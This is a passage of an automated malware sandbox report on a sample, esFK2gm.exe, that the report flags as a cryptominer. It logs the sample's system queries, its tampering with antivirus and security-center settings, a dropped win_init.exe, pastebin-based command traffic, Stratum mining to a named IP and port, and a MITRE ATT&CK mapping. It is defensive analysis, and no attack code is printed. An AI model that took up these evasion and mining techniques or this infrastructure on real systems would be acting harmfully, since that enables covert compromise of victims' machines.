                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Changes security center settings (notifications, updates, antivirus, firewall)
                          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                          Source: svchost.exe, 0000001D.00000002.2130060153.000001F188D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 0000001D.00000002.2130060153.000001F188D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		11
                          Input Capture                          		2
                          File and Directory Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Shared Modules                          		21
                          Registry Run Keys / Startup Folder                          		611
                          Process Injection                          		1
                          Obfuscated Files or Information                          		LSASS Memory24
                          System Information Discovery                          		Remote Desktop Protocol11
                          Input Capture                          		1
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter                          		Logon Script (Windows)21
                          Registry Run Keys / Startup Folder                          		1
                          Install Root Certificate                          		Security Account Manager1
                          Query Registry                          		SMB/Windows Admin SharesData from Network Shared Drive11
                          Encrypted Channel                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts3
                          PowerShell                          		Login HookLogin Hook1
                          Software Packing                          		NTDS251
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture1
                          Non-Standard Port                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets2
                          Process Discovery                          		SSHKeylogging2
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Masquerading                          		Cached Domain Credentials151
                          Virtualization/Sandbox Evasion                          		VNCGUI Input Capture13
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Modify Registry                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal Capture1
                          Proxy                          		Exfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                          Virtualization/Sandbox Evasion                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt611
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632653 Sample: esFK2gm.exe Startdate: 08/03/2025 Architecture: WINDOWS Score: 100 60 pastebin.com 2->60 62 objects.githubusercontent.com 2->62 64 github.com 2->64 78 Sigma detected: Xmrig 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Multi AV Scanner detection for submitted file 2->82 86 9 other signatures 2->86 8 esFK2gm.exe 2 1 2->8         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 9 other processes 2->16 signatures3 84 Connects to a pastebin service (likely for C&C) 60->84 process4 dnsIp5 70 github.com 140.82.121.4, 443, 49681, 49703 GITHUBUS United States 8->70 72 objects.githubusercontent.com 185.199.108.133, 443, 49682, 49692 FASTLYUS Netherlands 8->72 74 pastebin.com 104.20.4.235, 443, 49683, 49684 CLOUDFLARENETUS United States 8->74 96 Installs new ROOT certificates 8->96 98 Found strings related to Crypto-Mining 8->98 100 Found Tor onion address 8->100 108 7 other signatures 8->108 18 notepad.exe 8->18         started        22 tasklist.exe 1 8->22         started        35 5 other processes 8->35 102 Suspicious powershell command line found 12->102 104 Bypasses PowerShell execution policy 12->104 24 powershell.exe 14 21 12->24         started        27 conhost.exe 12->27         started        29 powershell.exe 20 14->29         started        31 conhost.exe 14->31         started        76 127.0.0.1 unknown unknown 16->76 106 Changes security center settings (notifications, updates, antivirus, firewall) 16->106 33 powershell.exe 16->33         started        37 4 other processes 16->37 signatures6 process7 dnsIp8 66 45.144.212.77, 3333, 49691 HPC-MVM-ASHU Ukraine 18->66 88 System process connects to network (likely due to code injection or exploit) 18->88 90 Query firmware table information (likely to detect VMs) 18->90 39 conhost.exe 22->39         started        68 140.82.121.3, 443, 49690, 49697 GITHUBUS United States 24->68 58 C:\Users\user\AppData\Roaming\win_init.exe, PE32+ 24->58 dropped 92 Powershell drops PE file 24->92 41 conhost.exe 24->41         started        43 win_init.exe 29->43         started        46 conhost.exe 29->46         started        48 win_init.exe 33->48         started        50 conhost.exe 33->50         started        56 5 other processes 35->56 52 conhost.exe 37->52         started        54 conhost.exe 37->54         started        file9 94 Detected Stratum mining protocol 66->94 signatures10 process11 signatures12 110 Multi AV Scanner detection for dropped file 43->110 112 Found Tor onion address 43->112

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.